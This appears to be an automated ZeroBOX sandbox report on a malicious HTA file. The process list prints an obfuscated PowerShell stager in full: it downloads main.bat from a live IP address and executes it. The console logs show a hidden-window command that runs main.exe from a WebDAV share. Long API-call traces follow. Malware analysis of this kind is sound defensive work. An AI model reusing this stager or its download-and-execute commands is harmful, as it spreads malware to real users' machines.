Summary | ZeroBOX

test.hta

Generic Malware Antivirus PowerShell
Category FILE
Machine s1_win7_x6401
Started Oct. 17, 2023, 10:08 a.m.
Completed Oct. 17, 2023, 10:11 a.m.
Size 10.3KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 db2fde02752a7a3ddcbf39589acdf815
SHA256 e44605478a95d78476e430f40a5720fe3286b768cd7ab6e52943553516c2b484
CRC32 FFAF323E
ssdeep 192:xfsOsiCk2SOsCjFeZ2ZlHeBsehk0PHi+PLr:xf2+H
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\test.hta (PID 2560)
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH; (PID 2656)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.207.183.9 Active Moloch

Suricata Alerts

Flow TCP 91.207.183.9:8000 -> 192.168.56.101:49163
SID 2026989
Signature ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1
Category Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:718
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJb
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: SPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }el
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: seif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $Tr
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ue){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUf
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcE
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: HEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: 888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointMa
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: nager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk =
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVI
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: bAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOc
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: SGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: )};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:App
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Data + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZ
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: qInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The term '\\91.207.183.9@8000\DavWWWRoot\main.exe' is not recognized as the nam
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: e of a cmdlet, function, script file, or operable program. Check the spelling o
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: f the name, or if a path was included, verify that the path is correct and try
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: again.
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:40
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + \\91.207.183.9@8000\DavWWWRoot\main.exe <<<<
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (\\91.207.183.9@8000\DavWWWRoot\
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: main.exe:String) [], CommandNotFoundException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053d1d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dbd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053d018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053d018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053d018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053d8d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dd58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0053dc98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005a3f38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005a40b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005a40b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005a40b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address
suspicious_request GET http://91.207.183.9:8000/main.bat
request GET http://91.207.183.9:8000/main.bat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02820000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02777000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02775000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02726000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02728000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
